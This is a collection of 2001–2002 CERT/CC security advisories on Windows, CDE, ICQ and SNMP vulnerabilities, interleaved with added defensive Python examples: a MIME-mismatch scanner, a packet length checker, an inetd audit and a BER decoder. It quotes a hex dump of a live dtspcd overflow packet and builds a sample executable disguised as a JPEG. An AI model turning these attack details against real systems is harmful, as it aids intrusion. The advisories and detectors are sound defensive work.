Disable file downloads in all security zones

As a workaround, you can prevent malicious files from being downloaded by disabling file downloads in all security zones. Note that this decision will impact browser functionality.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory.
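The flaw is a disagreement between the type a file claims in its MIME headers and the type implied by its name and contents, checked in one place and ignored in another. A mail gateway or proxy can refuse such disagreements before a vulnerable renderer sees them. The following is an added example, not code from the advisory or from Microsoft: the message, file names and payload bytes are constructed, and the magic-byte table and extension list are small assumed sets chosen to cover the case the advisory describes.

```python
import base64
import os
from email import message_from_string

# Constructed sample payloads: only the leading magic bytes matter here.
EXE_BYTES = b"MZ\x90\x00" + b"\x00" * 60        # DOS/PE executable header
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # JPEG/JFIF header

# Constructed HTML message with two embedded files: one whose headers call
# it a JPEG while its name and contents say executable (the mismatch the
# advisory describes), and one that is consistently a JPEG.
SAMPLE_MESSAGE = f"""\
From: sender@example.com
To: recipient@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html

<html><body><img src="cid:pic"></body></html>
--b1
Content-Type: image/jpeg
Content-ID: <pic>
Content-Disposition: inline; filename="picture.exe"
Content-Transfer-Encoding: base64

{base64.b64encode(EXE_BYTES).decode()}
--b1
Content-Type: image/jpeg
Content-Disposition: attachment; filename="photo.jpg"
Content-Transfer-Encoding: base64

{base64.b64encode(JPEG_BYTES).decode()}
--b1--
"""

# Assumed minimal magic-byte table; a production filter would use a fuller one.
MAGIC = [
    (b"MZ", "application/x-msdownload"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF8", "image/gif"),
]
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}


def sniff_type(data):
    """Best-effort media type from leading bytes; None when unknown."""
    for magic, mtype in MAGIC:
        if data.startswith(magic):
            return mtype
    return None


def check_part(part):
    """Compare the three places a file's type is asserted: the Content-Type
    header, the file name extension, and the bytes themselves. A renderer
    that trusts one when deciding and another when acting is only fooled
    when they disagree, so every disagreement is reported as a finding."""
    findings = []
    declared = part.get_content_type()
    filename = part.get_filename() or ""
    ext = os.path.splitext(filename)[1].lower()
    sniffed = sniff_type(part.get_payload(decode=True) or b"")
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"executable extension {ext} declared as {declared}")
    if sniffed and sniffed != declared:
        findings.append(f"contents look like {sniffed}, declared as {declared}")
    return findings


def scan_message(raw):
    """Map each named file in the message to its list of findings."""
    msg = message_from_string(raw)
    return {
        part.get_filename(): check_part(part)
        for part in msg.walk()
        if part.get_filename()
    }


if __name__ == "__main__":
    for name, findings in scan_message(SAMPLE_MESSAGE).items():
        print(name, "->", findings or "consistent")
```

Blocking on any mismatch is deliberately stricter than the patched browser behaviour: a file that is really a JPEG but named .exe is also rejected, which costs nothing in practice and removes the need for the filter to guess which of the three assertions the eventual renderer will believe.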
As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Microsoft Corporation

The following documents regarding this vulnerability are available from Microsoft:

http://www.microsoft.com/technet/security/bulletin/MS01-058.asp
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q313675

_________________________________________________________________

The CERT Coordination Center acknowledges Jouko Pynnonen as the discoverer of this vulnerability and thanks Microsoft for the information presented in MS01-058.

_________________________________________________________________

Author: This document was written by Jeffrey P. Lanza.

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2001-36.html

______________________________________________________________________

Copyright 2001 Carnegie Mellon University.

Revision History

December 19, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPCEWlaCVPMXQI2HJAQFgDwP/RG6V61VtHeQAXVUL/JxqTXahz0BpwxPW
WCyHWrIZ7fkXTJJtecqGD3zeDiWNwdk+r83a5amgCzbj2Abfp6U3mmTOArlkV3Ge
RbptkjNfd4M1KLtvbjMBSUlypxDdT/fLSjogT57IJk2ZiD3WMxvBU0CQun+zxhu1
lMdqudg6GpQ=
=Qwr2
-----END PGP SIGNATURE-----

From - Thu Dec 20 18:50:55 2001
Date: Thu, 20 Dec 2001 20:22:24 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: CERT Advisory CA-2001-37 Buffer Overflow in UPnP Service On Microsoft Windows

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-37 Buffer Overflow in UPnP Service On Microsoft Windows

Original release date: December 20, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft Windows XP
* Microsoft Windows ME
* Microsoft Windows 98
* Microsoft Windows 98SE

Overview

Vulnerabilities in software included by default on Microsoft Windows XP, and optionally on Windows ME and Windows 98, may allow an intruder to execute arbitrary code on vulnerable systems, to launch denial-of-service attacks against vulnerable systems, or to use vulnerable systems to launch denial-of-service attacks against third-party systems.

I. Description

There is a vulnerability in the Universal Plug and Play (UPnP) service on Microsoft Windows XP and Microsoft Windows ME that could permit an intruder to execute arbitrary code with administrative privileges on a vulnerable system. The UPnP service is enabled by default on XP. Microsoft does not ship Windows ME with UPnP enabled by default, but some PC manufacturers do. UPnP may be optionally installed on Windows 98 and Windows 98SE. This vulnerability was discovered by Eeye Digital Security. For more information, see

http://www.eeye.com/html/Research/Advisories/AD20011220.html
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp

Universal Plug and Play (UPnP) is a set of protocols that allow computer systems and network devices to work together with little or no prior configuration. One vulnerability is a buffer overflow in the code that handles UPnP NOTIFY directives. This vulnerability permits an intruder to send a malicious NOTIFY directive to a vulnerable computer and cause the computer to run code of the intruder's choice. The code will run with full privileges on all vulnerable systems, including Windows XP. This can permit an attacker to take complete control of the system.

A second vulnerability in the Microsoft Windows implementation of UPnP could allow an intruder to consume memory and processor time on vulnerable systems, resulting in performance degradation. Variations on this problem can allow an intruder to use a vulnerable system to launch a denial-of-service attack against a third party.

For more information about these vulnerabilities, see

http://www.kb.cert.org/vuls/id/951555
http://www.kb.cert.org/vuls/id/411059

These vulnerabilities have been assigned the CVE identifiers CAN-2001-0876 and CAN-2001-0877, respectively.

II. Impact

Intruders can gain complete control of vulnerable systems, or interrupt the normal operation of vulnerable systems.

III. Solution

Apply a patch from your vendor

Microsoft has provided patch information in their bulletin. Please see MS01-059, available from

http://www.microsoft.com/technet/security/bulletin/MS01-059.asp

Block Access to UPnP Service

Until a patch can be applied, you can reduce your exposure to this problem by blocking access to ports 1900 and 5000 at your network border. This does not eliminate your exposure to attacks originating from within your network, however. Note that Microsoft Internet Connection Firewall, which runs by default on Windows XP, does not provide complete protection against this attack. Specifically, an intruder can still use a broadcast or multicast address to reach the UPnP service on Microsoft Windows. On systems that don't require UPnP, it can be disabled.

Author: Shawn V. Hernan

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2001-37.html

______________________________________________________________________

Copyright 2001 Carnegie Mellon University.

Revision History

December 20, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPCKL0KCVPMXQI2HJAQHiugP6AiOA0OEEVmdFKhkhZEznW84XKBZPrURz
Z9XA6lYs7ZdZnLD3xRAheDuoYF2p3xVrJXayzXPVrk7axWotgljqUBBMn4Ce5Nh8
2kRMjVHt66jW39R5TGc37B5XBjy55XXNwAoBzBFC8uvu0tk+hvRpbkxqGZ7rhKtI
2AWSkUlltMk=
=O0YG
-----END PGP SIGNATURE-----

From - Mon Jan 14 12:42:13 2002
Date: Mon, 14 Jan 2002 12:03:42 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess Control Service

Original release date: January 14, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running CDE

Overview

The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running the CDE Subprocess Control Service buffer overflow vulnerability identified in CA-2001-31 and discussed in VU#172583.

I. Description

Since CA-2001-31 was originally released last November, the CERT/CC has received reports of scanning for dtspcd (6112/tcp). Just recently, however, we have received credible reports of an exploit for Solaris systems. Using network traces provided by The Honeynet Project, we have confirmed that the dtspcd vulnerability identified in CA-2001-31 and discussed in VU#172583 is actively being exploited.

The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. The CDE Subprocess Control Service (dtspcd) is a network daemon that accepts requests from clients to execute commands and launch applications remotely. On systems running CDE, dtspcd is spawned by the Internet services daemon (typically inetd or xinetd) in response to a CDE client request. dtspcd is typically configured to run on port 6112/tcp with root privileges.

There is a remotely exploitable buffer overflow vulnerability in a shared library that is used by dtspcd. During client negotiation, dtspcd accepts a length value and subsequent data from the client without performing adequate input validation. As a result, a malicious client can manipulate data sent to dtspcd and cause a buffer overflow, potentially executing code with root privileges.

The overflow occurs in a fixed-size 4K buffer that is exploited by the contents of one of the attack packets. The signature can be found at bytes 0x3e-0x41 in the following attack packet from a tcpdump log (lines may wrap):

09:46:04.378306 10.10.10.1.3592 > 10.10.10.2.6112: P 1:1449(1448) ack 1 win 16060 (DF)
0x0000 4500 05dc a1ac 4000 3006 241c 0a0a 0a01 E.....@.0.$.....
0x0010 0a0a 0a02 0e08 17e0 fee2 c115 5f66 192f ...f........_f./
0x0020 8018 3ebc e1e9 0000 0101 080a 1ba7 dffb ..>.............
0x0030 003f 7548 3030 3030 3030 3032 3034 3130 .?uH000000020410
0x0040 3365 3030 3031 2020 3420 0000 0031 3000 3e0001..4....10.
0x0050 801c 4011 801c 4011 1080 0101 801c 4011 ..@...@.......@.
0x0060 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
...

The value 0x103e in the ASCII (right) column above is interpreted by the server as the number of bytes in the packet to copy into the internal 4K (0x1000) buffer. Since 0x103e is greater than 0x1000, the last 0x3e bytes of the packet will overwrite memory after the end of the 4K buffer. This is the same compromise vector identified in VU#172583.

It is important to note that several Internet-enabled games may also use port 6112/tcp as a legitimate part of their normal operation, therefore, not all network activity involving this service may be malicious. Network administrators monitoring this type of activity may wish to verify whether probes of this type are actually attempts to exploit VU#172583.

Many common UNIX systems ship with CDE installed and enabled by default.
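The advisory gives everything needed to check a captured 6112/tcp packet mechanically rather than by eye: the position of the length field (bytes 0x3e-0x41), its encoding (ASCII hex, "103e" in the trace) and the size of the buffer it is copied into (0x1000). The following is an added example, not code from the advisory, from the Honeynet Project or from any CDE vendor; it rebuilds the packet from the tcpdump hex dump quoted above (used here as sample input) and flags a declared length larger than the 4K buffer. Because games also use 6112/tcp, inspecting this field is a better filter than the port alone.

```python
import re

# Sample input: the first seven lines of the tcpdump hex dump quoted in
# CA-2002-01, reproduced here only as test data for the parser.
SAMPLE_DUMP = """\
0x0000 4500 05dc a1ac 4000 3006 241c 0a0a 0a01 E.....@.0.$.....
0x0010 0a0a 0a02 0e08 17e0 fee2 c115 5f66 192f ...f........_f./
0x0020 8018 3ebc e1e9 0000 0101 080a 1ba7 dffb ..>.............
0x0030 003f 7548 3030 3030 3030 3032 3034 3130 .?uH000000020410
0x0040 3365 3030 3031 2020 3420 0000 0031 3000 3e0001..4....10.
0x0050 801c 4011 801c 4011 1080 0101 801c 4011 ..@...@.......@.
0x0060 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
"""

DTSPCD_BUFFER_SIZE = 0x1000        # the fixed 4K buffer named in the advisory
LENGTH_FIELD = slice(0x3e, 0x42)   # packet bytes 0x3e-0x41, per the advisory

# One "tcpdump -X" line: offset, up to eight 16-bit hex groups, ASCII column.
# The group count is capped at eight so the ASCII column is never consumed.
HEX_LINE = re.compile(r"^0x([0-9a-f]{4})\s+((?:[0-9a-f]{4}\s+){1,8})", re.I)


def parse_tcpdump_hex(dump):
    """Rebuild raw packet bytes from tcpdump -X style output.

    Only the offset and hex columns are used; the ASCII column is lossy
    (non-printables appear as '.') and is ignored.
    """
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line.strip())
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"non-contiguous dump at offset {offset:#06x}")
        out += bytes.fromhex("".join(m.group(2).split()))
    return bytes(out)


def declared_length(packet):
    """Return the client-supplied length, sent as four ASCII hex digits at
    packet bytes 0x3e-0x41 ('103e' in the advisory's trace)."""
    field = packet[LENGTH_FIELD]
    if len(field) != 4 or any(c not in b"0123456789abcdefABCDEF" for c in field):
        raise ValueError(f"length field is not ASCII hex: {field!r}")
    return int(field.decode("ascii"), 16)


def check_dump(dump, buf_size=DTSPCD_BUFFER_SIZE):
    """Summarise whether the declared length would run past the 4K buffer,
    which is the condition the advisory describes for VU#172583."""
    n = declared_length(parse_tcpdump_hex(dump))
    return {
        "declared_length": n,
        "buffer_size": buf_size,
        "excess_bytes": max(0, n - buf_size),
        "suspicious": n > buf_size,
    }


if __name__ == "__main__":
    r = check_dump(SAMPLE_DUMP)
    print(f"declared {r['declared_length']:#x}, buffer {r['buffer_size']:#x}, "
          f"excess {r['excess_bytes']:#x}, suspicious={r['suspicious']}")
```

On the advisory's trace the check reports a declared length of 0x103e, 0x3e bytes more than the buffer, which matches the overwrite the text describes. A packet with a length at or below 0x1000 is reported as not suspicious, so ordinary game traffic on the same port does not trip it unless it happens to carry this field in this position.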
To determine if your system is configured to run dtspcd, check for the following entries (lines may wrap):

in /etc/services

dtspc 6112/tcp

in /etc/inetd.conf

dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd

Any system that does not run the CDE Subprocess Control Service is not vulnerable to this problem.

II. Impact

An attacker can execute arbitrary code with root privileges.

III. Solution

Apply a patch

VU#172583 contains information from vendors who have provided information for this advisory. We will update the vulnerability note as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly. Vendor information can be found in the "Systems Affected" section of VU#172583

http://www.kb.cert.org/vuls/id/172583#systems

Limit access to vulnerable service

Until patches are available and can be applied, you may wish to limit or block access to the Subprocess Control Service from untrusted networks such as the Internet. Using a firewall or other packet-filtering technology, block or restrict access to the port used by the Subprocess Control Service. As noted above, dtspcd is typically configured to listen on port 6112/tcp. It may be possible to use TCP Wrapper or a similar technology to provide improved access control and logging functionality for dtspcd connections. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network. It is important to understand your network configuration and service requirements before deciding what changes are appropriate.

TCP Wrapper is available from ftp://ftp.porcupine.org/pub/security/index.html

Disable vulnerable service

You may wish to consider disabling dtspcd by commenting out the appropriate entry in /etc/inetd.conf. As a best practice, the CERT/CC recommends disabling any services that are not explicitly required.
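The configuration check above and the "comment it out" remedy can be verified across many hosts with a small audit that reads both files and reports whether inetd will actually spawn dtspcd, on which port and as which user. The following is an added example, not code from the advisory or from any CDE vendor; the two file excerpts are constructed, shaped after the entries the advisory quotes, and a real run would read /etc/services and /etc/inetd.conf from each host.

```python
# Constructed excerpts of /etc/services and /etc/inetd.conf, shaped after
# the entries the advisory tells administrators to look for.
SAMPLE_SERVICES = """\
# constructed excerpt of /etc/services
ssh       22/tcp
dtspc     6112/tcp        # CDE subprocess control
"""

SAMPLE_INETD_CONF = """\
# constructed excerpt of /etc/inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd
dtspc   stream  tcp     nowait  root    /usr/dt/bin/dtspcd      /usr/dt/bin/dtspcd
#fs     stream  tcp     wait    nobody  /usr/openwin/lib/fs.auto fs
"""

INETD_FIELDS = ("service", "socket_type", "protocol", "wait", "user", "server", "args")


def parse_services(text):
    """Map service name -> (port, protocol), ignoring comments and blanks."""
    table = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, portproto = line.split()[:2]
        port, proto = portproto.split("/", 1)
        table[name] = (int(port), proto)
    return table


def active_inetd_entries(text):
    """Entries inetd would actually start; commented-out lines are skipped,
    which is what makes the advisory's 'comment it out' remedy effective."""
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 6)   # server arguments stay as one field
        entries.append(dict(zip(INETD_FIELDS, fields)))
    return entries


def audit_dtspcd(services_text, inetd_text, service="dtspc"):
    """Report whether inetd will spawn the service, on which port and as whom."""
    port = parse_services(services_text).get(service)
    entry = next((e for e in active_inetd_entries(inetd_text)
                  if e.get("service") == service), None)
    return {
        "enabled": entry is not None,
        "port": port[0] if port else None,
        "protocol": port[1] if port else None,
        "user": entry.get("user") if entry else None,
        "runs_as_root": bool(entry) and entry.get("user") == "root",
        "server": entry.get("server") if entry else None,
    }


if __name__ == "__main__":
    print(audit_dtspcd(SAMPLE_SERVICES, SAMPLE_INETD_CONF))
```

An entry that is present but commented out reports enabled=False, so re-running the audit after applying the remedy confirms that inetd will no longer start the daemon; the port and user fields tell the reviewer what a firewall rule or TCP Wrapper entry needs to cover while the service is still needed.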
As noted above, it is important to consider the consequences of such a change in your environment. Appendix A. - References 1. http://www.kb.cert.org/vuls/id/172583 2. http://www.cert.org/advisories/CA-2001-31.html 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803 4. http://xforce.iss.net/alerts/advise101.php 5. http://www.opengroup.org/cde/ 6. http://www.opengroup.org/desktop/faq/ _________________________________________________________________ The CERT Coordination Center thanks The Honeynet Project for their assistance in providing network traces of the exploitation. _________________________________________________________________ Authors: Allen Householder and Art Manion ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-01.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. 
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History

January 14, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
-----END PGP SIGNATURE-----

From - Thu Jan 24 14:51:58 2002
Date: Thu, 24 Jan 2002 14:54:58 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-02 Buffer Overflow in AOL ICQ

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-02 Buffer Overflow in AOL ICQ

Original release date: January 24, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* AOL Mirabilis ICQ Versions 2001A and prior
* Voice Video & Games plugin installed with AOL Mirabilis ICQ Versions 2001B Beta v5.18 Build #3659 and prior

Overview

There is a remotely exploitable buffer overflow in ICQ. Attackers that are able to exploit the vulnerability may be able to execute arbitrary code with the privileges of the victim user. Full details are discussed in VU#570167. An exploit is known to exist, but we do not believe it has been distributed in the wild. We have not seen active scanning for this vulnerability, nor have we received any reports of this vulnerability being exploited.

I. Description

ICQ is a program for communicating with other users over the Internet. ICQ is widely used (by over 122 million people according to ICQ Inc, an AOL Time Warner owned subsidiary). A buffer overflow exists in the ICQ client for Windows. The buffer overflow occurs during the processing of a Voice Video & Games feature request message. This message is supposed to be a request from another ICQ user inviting the victim to participate interactively with a third-party application. In versions prior to 2001B, the buffer overflow occurs in code within the ICQ client. In version 2001B the code containing the buffer overflow was moved to an external plug-in. Therefore, all versions prior to the latest build of 2001B are vulnerable.
Upon connection to an AOL ICQ server, vulnerable builds of the 2001B client will be instructed by the server to disable the vulnerable plug-in. Since versions of the ICQ client prior to 2001B do not have an external plug-in to disable, they are vulnerable even after connecting to the server. AOL Time Warner is recommending all users of vulnerable versions of ICQ upgrade to 2001B Beta v5.18 Build #3659.

During normal operation, ICQ clients can exchange messages with one another through the ICQ servers or via a direct connection. The buffer overflow specifically occurs during the processing of the Voice Video & Games request via a Type, Length, Value (TLV) tuple with type 0x2711 from the ICQ server, or via a crafted direct connection request. Some versions of the ICQ client open port 4000/UDP for client-server communication. Other versions open port 5190/TCP for this communication.

As with the previously reported AIM vulnerability, AOL has modified the ICQ server infrastructure to filter malicious messages that attempt to exploit this vulnerability, preventing it from being exploited through an AOL ICQ server. Exploiting the vulnerability through other means (man-in-the-middle attacks, third-party ICQ servers, DNS spoofing, network sniffing, etc.) may still be possible. Also, since UDP packets can be broadcast on a network, a malicious TLV packet with a spoofed source IP address may be accepted as a legitimate server message.

The ICQ client also listens on a variably assigned TCP port for direct connection requests. A person who wishes to establish a direct connection can query an ICQ server for the IP address and listening port of the victim. Versions 2000A and prior accept direct connections from anyone by default. Later versions of ICQ can be configured to accept direct connections from anyone. Since ICQ requests can be sent directly from one client to another, blocking requests through a central server is not a completely effective solution.
The effective solution is to apply a patch, when available, that fixes the buffer overflow, or upgrade to 2001B Beta v5.18 Build #3659 with the Voice Video & Games feature disabled.

This vulnerability has been assigned the identifier CAN-2002-0028 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0028

II. Impact

An attacker can execute arbitrary code with the privileges of the victim user.

III. Solution

All users should upgrade to version 2001B Beta v5.18 Build #3659. There is currently no patch available for the ICQ plug-in for 2001B or versions of the ICQ client prior to 2001B. Version 2001B Beta v5.18 Build #3659's installer will delete the vulnerable plug-in. In addition, for users who log in to the server with versions of 2001B prior to Beta v5.18 Build #3659, access to the vulnerable plug-in will be disabled. Users with versions prior to 2001B must upgrade to mitigate this vulnerability.

Block ICQ/SMS requests at the firewall

Blocking connections to login.icq.com and access to ports 4000/UDP, 5190/TCP and the TCP port that your client chooses to listen on may prevent exploitation of this vulnerability. Note that the client may establish a new listening port each time it is run. Note also that this does not protect you from attacks within the perimeter of your firewall.

Block untrusted messages

ICQ permits the user to deny direct connections from anyone without authorization or accept direct connections from known peers only. We recommend denying direct connections from anyone without authorization. By accepting direct connections from known peers, you may still be vulnerable to attacks that originate from known peers if the peer has been compromised.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history.
If a particular vendor is not listed below, we have not received their comments.

AOL Time Warner

See http://web.icq.com/help/quickhelp/1,,117,00.html
_________________________________________________________________

The CERT Coordination Center thanks Daniel Tan and AOL Time Warner for their assistance in discovering and analyzing this vulnerability.
_________________________________________________________________

Author: Jason A. Rafail
_________________________________________________________________

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/570167
2. http://www.securityfocus.com/bid/3813
3. http://web.icq.com/help/quickhelp/1,,117,00.html
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-02.html
______________________________________________________________________
______________________________________________________________________

Copyright 2002 Carnegie Mellon University.

Revision History

January 24, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
-----END PGP SIGNATURE-----

From - Tue Feb 12 15:02:08 2002
Date: Tue, 12 Feb 2002 14:41:02 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-03 Multiple Vulnerabilities in Many Implementations

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)

Original release date: February 12, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

Products from a very wide variety of vendors may be affected. See Vendor Information for details from vendors who have provided feedback for this advisory. In addition to the vendors who provided feedback for this advisory, a list of vendors whom CERT/CC contacted regarding these problems is available from

    http://www.kb.cert.org/vuls/id/854306
    http://www.kb.cert.org/vuls/id/107186

Many other systems making use of SNMP may also be vulnerable but were not specifically tested.

Overview

Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior. If your site uses SNMP in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section below.

In addition to this advisory, we also have an FAQ available at
http://www.cert.org/tech_tips/snmp_faq.html

I. Description

The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices.
Version 1 of the protocol (SNMPv1) defines several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send unsolicited alerts.

The Oulu University Secure Programming Group (OUSPG, http://www.ee.oulu.fi/research/ouspg/) has reported numerous vulnerabilities in SNMPv1 implementations from many different vendors. More information about SNMP and OUSPG can be found in Appendix C.

OUSPG's research focused on the manner in which SNMPv1 agents and managers handle request and trap messages. By applying the PROTOS c06-snmpv1 test suite (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/0100.html) to a variety of popular SNMPv1-enabled products, the OUSPG revealed the following vulnerabilities:

VU#107186 - Multiple vulnerabilities in SNMPv1 trap handling

SNMP trap messages are sent from agents to managers. A trap message may indicate a warning or error condition or otherwise notify the manager about the agent's state. SNMP managers must properly decode trap messages and process the resulting data. In testing, OUSPG found multiple vulnerabilities in the way many SNMP managers decode and process SNMP trap messages.

VU#854306 - Multiple vulnerabilities in SNMPv1 request handling

SNMP request messages are sent from managers to agents. Request messages might be issued to obtain information from an agent or to instruct the agent to configure the host device. SNMP agents must properly decode request messages and process the resulting data. In testing, OUSPG found multiple vulnerabilities in the way many SNMP agents decode and process SNMP request messages.

Vulnerabilities in the decoding and subsequent processing of SNMP messages by both managers and agents may result in denial-of-service conditions, format string vulnerabilities, and buffer overflows. Some vulnerabilities do not require the SNMP message to use the correct SNMP community string.
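The decoding stage that both vulnerability notes describe, as an added example that is not code from the advisory or from any vendor: a strict BER decoder for the outer SNMPv1 message (version, community, PDU) that validates every length against the bytes actually received, so a crafted length is rejected before the community string is ever compared. The tag constants, sample packets and function names are constructed for this example.

```python
"""Strict decoder for the outer structure of an SNMPv1 message (added example).

Every BER length is checked against the bytes actually received, so a
truncated, oversized or indefinite length is rejected instead of being used
as a copy size; all of this happens before the community string is compared.
Tag constants, packets and helper names below are constructed for the example.
"""

SEQUENCE, INTEGER, OCTET_STRING, NULL_T, OID = 0x30, 0x02, 0x04, 0x05, 0x06
GET_REQUEST, GET_NEXT, GET_RESPONSE, SET_REQUEST, TRAP = 0xA0, 0xA1, 0xA2, 0xA3, 0xA4
PDU_TAGS = {GET_REQUEST, GET_NEXT, GET_RESPONSE, SET_REQUEST, TRAP}
MAX_LENGTH_OCTETS = 4          # long-form lengths wider than this are absurd for SNMP


class MalformedSnmp(ValueError):
    """Any encoding that is not safe to hand to the rest of the agent."""


def read_tlv(buf, pos, end):
    """Parse one BER TLV inside buf[pos:end]; return (tag, value_start, value_end)."""
    if pos + 2 > end:
        raise MalformedSnmp("truncated TLV header at offset %d" % pos)
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short form
        length = first
    elif first == 0x80:                   # indefinite form: never valid in SNMP
        raise MalformedSnmp("indefinite length at offset %d" % pos)
    else:                                 # long form: next n octets hold the length
        n = first & 0x7F
        if n > MAX_LENGTH_OCTETS or pos + n > end:
            raise MalformedSnmp("bad long-form length at offset %d" % pos)
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if length > end - pos:                # the check a vulnerable decoder lacks
        raise MalformedSnmp("length %d exceeds %d remaining bytes" % (length, end - pos))
    return tag, pos, pos + length


def expect(buf, pos, end, wanted):
    """read_tlv, but the tag must be `wanted`; returns (value_start, value_end)."""
    tag, vstart, vend = read_tlv(buf, pos, end)
    if tag != wanted:
        raise MalformedSnmp("expected tag 0x%02x, got 0x%02x" % (wanted, tag))
    return vstart, vend


def decode_snmpv1_header(packet):
    """Return (version, community, pdu_tag, pdu_bytes) or raise MalformedSnmp."""
    end = len(packet)
    vstart, vend = expect(packet, 0, end, SEQUENCE)
    if vend != end:
        raise MalformedSnmp("trailing bytes after outer SEQUENCE")
    vs, ve = expect(packet, vstart, vend, INTEGER)
    if not 1 <= ve - vs <= 4:
        raise MalformedSnmp("unsupported INTEGER size")
    version = int.from_bytes(packet[vs:ve], "big", signed=True)
    if version != 0:
        raise MalformedSnmp("not an SNMPv1 message (version %d)" % version)
    vs, ve = expect(packet, ve, vend, OCTET_STRING)
    community = packet[vs:ve]
    tag, vs, ve = read_tlv(packet, ve, vend)
    if tag not in PDU_TAGS:
        raise MalformedSnmp("unknown PDU tag 0x%02x" % tag)
    if ve != vend:
        raise MalformedSnmp("trailing bytes after PDU")
    return version, community, tag, packet[vs:ve]


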